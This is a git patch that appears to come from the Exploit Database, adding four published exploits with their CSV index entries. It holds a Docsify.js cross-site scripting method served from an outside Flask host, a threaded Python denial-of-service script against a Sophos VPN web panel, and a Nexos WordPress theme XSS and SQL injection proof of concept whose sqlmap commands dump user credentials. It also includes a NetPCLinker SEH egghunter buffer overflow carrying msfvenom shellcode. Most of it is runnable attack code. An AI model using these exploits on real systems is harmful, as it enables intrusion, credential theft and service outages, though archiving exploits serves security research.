From 67c1f99f412926da3fc1d340581fad7842e81bad Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 23 Jul 2020 05:02:04 +0000 Subject: [PATCH] DB: 2020-07-23 4 changes to exploits/shellcodes NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter) Docsify.js 4.11.4 - Reflective Cross-Site Scripting WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection Sophos VPN Web Panel 2020 - Denial of Service (Poc) --- exploits/multiple/webapps/48681.txt | 66 +++++++++++++++++++ exploits/multiple/webapps/48683.py | 99 +++++++++++++++++++++++++++++ exploits/php/webapps/48682.txt | 53 +++++++++++++++ exploits/windows/local/48680.py | 62 ++++++++++++++++++ files_exploits.csv | 4 ++ 5 files changed, 284 insertions(+) create mode 100644 exploits/multiple/webapps/48681.txt create mode 100755 exploits/multiple/webapps/48683.py create mode 100644 exploits/php/webapps/48682.txt create mode 100755 exploits/windows/local/48680.py diff --git a/exploits/multiple/webapps/48681.txt b/exploits/multiple/webapps/48681.txt new file mode 100644 index 000000000..fecc004a1 --- /dev/null +++ b/exploits/multiple/webapps/48681.txt @@ -0,0 +1,66 @@ +# Exploit Title: Docsify.js 4.11.4 - Reflective Cross-Site Scripting +# Date: 2020-06-22 +# Exploit Author: Amin Sharifi +# Vendor Homepage: https://docsify.js.org +# Software Link: https://github.com/docsifyjs/docsify +# Version: 4.11.4 +# Tested on: Windows 10 +# CVE : CVE-2020-7680 + + +docsify.js uses fragment identifiers (parameters after # sign) to load +resources from server-side .md files. it then renders the .md file inside +the HTML page. + +For example : https://docsify.js.org/#/quickstart sends an ajax to +https://docsify.js.org/quickstart.md and renders it inside the html page. + +due to lack of validation it is possible to provide external URLs after the +/#/ and render arbitrary javascript/HTML inside the page which leads to +DOM-based Cross Site Scripting (XSS). + + +Steps to reproduce: + +step 1. setup a server (for example I use flask here, for the POC im +hosting one on https://asharifi.pythonanywhere.com ) + +step 2. the server should respond to request to /README.md with a crafted +XSS payload. here is the payload "Html Injection and XSS PoC

" +also the CORS should be set so that other Origins would be able to send +ajax requests to the server so Access-Control-Allow-Origin must be set to * +(or to the specific domain that you wanna exploit) example code below: + +------------------------------------------------- +from flask import Flask +import flask + +app = Flask(__name__) + + +@app.route('/README.md') +def inject(): + resp = flask.Response("Html Injection and XSS PoC

") + resp.headers['Access-Control-Allow-Origin'] = '*' + return resp + +------------------------------------------------------ +step 3. craft the link for execution of the exploit +for example for https://docsify.js.org website you can create the link as +below + +https://docsify.js.org/#//asharifi.pythonanywhere.com/README +(note that the mentioned domain is no longer vulnerable at the time writing +this report) + +when a user visits this URL an ajax request will be sent to +asharifi.pythonanywhere.com/README.md and the response of the request will +be rendered inside the webpage which results in XSS payload being executed +on the page. + + +snyk advisory: https://snyk.io/vuln/SNYK-JS-DOCSIFY-567099 +Mitre CVE entry: +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7680 \ No newline at end of file diff --git a/exploits/multiple/webapps/48683.py b/exploits/multiple/webapps/48683.py new file mode 100755 index 000000000..3fe956e43 --- /dev/null +++ b/exploits/multiple/webapps/48683.py @@ -0,0 +1,99 @@ +# Exploit Title: Sophos VPN Web Panel 2020 - Denial of Service (Poc) +# Date: 2020-06-17 +# Exploit Author: Berk KIRAS +# Vendor Homepage: https://www.sophos.com/ +# Version:2020 Web Panel +# Tested on: Apache +# Berk KIRAS PwC - Cyber Security Specialist +# Sophos VPN Web Portal Denial of Service Vulnerability +# System parse JSON data. If we want to send some JSON with invalid data format +# for ex. valid -> {"test","test2"} , invalid -> {"test",PAYLOAD"test2"} +# The system can not parse this data fastly and service down +# payload_option2 ="../../../../../../../../../FILE./FILE" + +#!/usr/bin/python3 + +import requests +import sys +import random +import threading + +def send_req(): + cnt = random.randint(9,22) + payload= "../"*cnt+'{FILE}' + my_datas_params = {"username":"test", + payload+"password":"admin", + "cookie":"0", + "submit":"

Oturum Aç
", + "language":"turkish", + "browser_id":"kbgacsyo-q4j5o7lr70e"} + + # You should change some values into the headers + Host_addr = sys.argv[2] + Origin=sys.argv[1]+"://"+sys.argv[2] + Referrer=sys.argv[1]+"://"+sys.argv[2] + Cookie=sys.argv[4] + #Headers + my_datas_headers ={ + "Host":str(Host_addr), + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0", + "Accept": "text/javascript, text/html, application/xml, text/xml, */*", + "Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "X-Requested-With": "XMLHttpRequest", + "X-Prototype-Version": "1.6.1_rc3", + "Content-type": "application/json; charset=UTF-8", + "Origin":Origin, + "Connection": "close", + "Referer":Referrer, + "Cookie":Cookie, + } + my_datas_headers2 ={ + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0", + "Accept": "text/javascript, text/html, application/xml, text/xml, */*", + "Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "X-Requested-With": "XMLHttpRequest", + "X-Prototype-Version": "1.6.1_rc3", + "Content-type": "application/json; charset=UTF-8", + "Connection": "close", + } + #If you want to edit and add headers some headers added + s = requests.session() + #if you want simple-> headers={'User-Agent': 'Mozilla', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'} + s.headers.update(my_datas_headers2) + print(s.headers.items) + r = s.post(sys.argv[1]+"://"+sys.argv[2]+sys.argv[3],data=my_datas_params) + + return s + +def main(): + if(len(sys.argv) < 6): + print("Usage:1) Implement your headers \n2)change payload if you want \n3) exploit.py \nExample-> exploit.py http vpn.test.com /test/index.plx 2\nCoded by b3rkk1r4s | PwC Cyber") + sys.exit(0) + else: + try: + req_count=0 + while(True): + if(int(sys.argv[5])==1): + resp = send_req() + req_count=req_count+1 + print("Sending Requests... Count: "+str(req_count)) + else: + threads = int(sys.argv[5]) + jobs = [] + for i in range(0, threads): + out_list = list() + thread = threading.Thread(target=send_req) + jobs.append(thread) + for j in jobs: + j.start() + print("Jobs Started!") + # Ensure all of the threads have finished + for j in jobs: + j.join() + + except Exception: + print(Exception) + +main() \ No newline at end of file diff --git a/exploits/php/webapps/48682.txt b/exploits/php/webapps/48682.txt new file mode 100644 index 000000000..47b39bac7 --- /dev/null +++ b/exploits/php/webapps/48682.txt @@ -0,0 +1,53 @@ +# Exploit Title: WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection +# Google Dork: inurl:/wp-content/themes/nexos/ +# Date: 2020-06-17 +# Exploit Author: Vlad Vector +# Vendor: Sanljiljan [ https://themeforest.net/user/sanljiljan ] +# Software Version: 1.7 +# Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242 +# Tested on: Debian 10 +# CVE: CVE-2020-15363, CVE-2020-15364 +# CWE: CWE-79, CWE-89 + + + +### [ Info: ] + +[i] The Nexos theme through 1.7 for WordPress allows side-map/?search_order= SQL Injection. + + + +### [ Vulnerabilities: ] + +[x] Unauthenticated Reflected XSS +[x] SQL Injection + + + +### [ PoC Unauthenticated Reflected XSS: ] + +[!] TARGET/TARGET-DIR/top-map/?search_order=idlisting DESC&search_location="> + +[!] GET /TARGET-DIR/top-map/?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E%3E HTTP/1.1 +Host: listing-themes.com + + + +### [ PoC SQL Injection: ] + +[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -dbs --random-agent --threads 4 + +[02:23:33] [INFO] the back-end DBMS is MySQL +[02:23:33] [INFO] fetching database names +[02:23:33] [INFO] fetching number of databases +[02:23:33] [INFO] resumed: 2 +available databases [2]: +[*] geniuscr_nexos +[*] information_schema + +[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -D geniuscr_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8 + +Database: TARGET-DB +Table: wp_users +[9 entries] ++--------------+------------------------------------+-------------------------+ \ No newline at end of file diff --git a/exploits/windows/local/48680.py b/exploits/windows/local/48680.py new file mode 100755 index 000000000..a62fc9b8b --- /dev/null +++ b/exploits/windows/local/48680.py @@ -0,0 +1,62 @@ +# Exploit Title: NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter) +# Date: 2019-06-28 +# Exploit Author: Saeed reza Zamanian +# Vendor Homepage: https://sourceforge.net/projects/netpclinker/ +# Software Link: https://sourceforge.net/projects/netpclinker/files/ +# Version: 1.0.0.0 +# Tested on: Windows Vista SP1 + +#!/usr/bin/python + +''' +# Replicate Crash: + 1) Install and Run the application + 2) Go to second tab "Clients Control Panel" + 3) Press Add button + 4) Run the exploit , the exploit creates a text file named payload.txt + 5) Copy payload.txt contents into the add client dialog , "DNS/IP" field + 6) Press OK . Your shellcode will be executed by pressing OK button. + +''' + +#msfvenom -p windows/exec CMD=calc -f c -b "\x00\x0a\x0d\x33\x35\x36" +#Bad Characters : \x0a\x0d\x33\x35\x36 + +shellcode = ( +"\xdb\xc4\xd9\x74\x24\xf4\x5b\xbe\x9a\x32\x43\xd2\x31\xc9\xb1" +"\x30\x83\xc3\x04\x31\x73\x14\x03\x73\x8e\xd0\xb6\x2e\x46\x96" +"\x39\xcf\x96\xf7\xb0\x2a\xa7\x37\xa6\x3f\x97\x87\xac\x12\x1b" +"\x63\xe0\x86\xa8\x01\x2d\xa8\x19\xaf\x0b\x87\x9a\x9c\x68\x86" +"\x18\xdf\xbc\x68\x21\x10\xb1\x69\x66\x4d\x38\x3b\x3f\x19\xef" +"\xac\x34\x57\x2c\x46\x06\x79\x34\xbb\xde\x78\x15\x6a\x55\x23" +"\xb5\x8c\xba\x5f\xfc\x96\xdf\x5a\xb6\x2d\x2b\x10\x49\xe4\x62" +"\xd9\xe6\xc9\x4b\x28\xf6\x0e\x6b\xd3\x8d\x66\x88\x6e\x96\xbc" +"\xf3\xb4\x13\x27\x53\x3e\x83\x83\x62\x93\x52\x47\x68\x58\x10" +"\x0f\x6c\x5f\xf5\x3b\x88\xd4\xf8\xeb\x19\xae\xde\x2f\x42\x74" +"\x7e\x69\x2e\xdb\x7f\x69\x91\x84\x25\xe1\x3f\xd0\x57\xa8\x55" +"\x27\xe5\xd6\x1b\x27\xf5\xd8\x0b\x40\xc4\x53\xc4\x17\xd9\xb1" +"\xa1\xe8\x93\x98\x83\x60\x7a\x49\x96\xec\x7d\xa7\xd4\x08\xfe" +"\x42\xa4\xee\x1e\x27\xa1\xab\x98\xdb\xdb\xa4\x4c\xdc\x48\xc4" +"\x44\xbf\x0f\x56\x04\x40" +) + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x65\x7a\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" +nSEH = '\xEB\xAA\x90\x90' #Jump Back + +# (Vista) +# PPR(ecx) : 0x00494b67 : startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [NPL.exe] +# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.0 (C:\Program Files\NetPCLinker\NPL.exe) + +SEH = '\x67\x4b\x49' +offset = "RezaReza"+shellcode +'\x41'*(1199-8-len(shellcode)-len(egghunter)-50) + +payload = offset+egghunter+"\x90"*50+nSEH+SEH + +try: + f=open("payload.txt","w") + print("[+] Creating %s bytes payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a10370b24..77a83fdbd 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11122,6 +11122,7 @@ id,file,description,date,author,type,platform,port 48644,exploits/hardware/local/48644.c,"Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel Local Privilege Escalation (PoC)",2020-03-21,TheFloW,local,hardware, 48677,exploits/windows/local/48677.txt,"Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path",2020-07-17,"Velayutham Selvaraj",local,windows, 48678,exploits/windows/local/48678.py,"Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)",2020-07-17,PovlTekstTV,local,windows, +48680,exploits/windows/local/48680.py,"NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)",2020-07-22,"Saeed reza Zamanian",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42926,3 +42927,6 @@ id,file,description,date,author,type,platform,port 48674,exploits/php/webapps/48674.txt,"Infor Storefront B2B 1.0 - 'usr_name' SQL Injection",2020-07-15,ratboy,webapps,php, 48676,exploits/lua/webapps/48676.txt,"Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)",2020-07-16,V1n1v131r4,webapps,lua, 48679,exploits/php/webapps/48679.txt,"CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)",2020-07-17,Noth,webapps,php, +48681,exploits/multiple/webapps/48681.txt,"Docsify.js 4.11.4 - Reflective Cross-Site Scripting",2020-07-22,"Amin Sharifi",webapps,multiple, +48682,exploits/php/webapps/48682.txt,"WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection",2020-07-22,"Vlad Vector",webapps,php, +48683,exploits/multiple/webapps/48683.py,"Sophos VPN Web Panel 2020 - Denial of Service (Poc)",2020-07-22,"Berk KIRAS",webapps,multiple,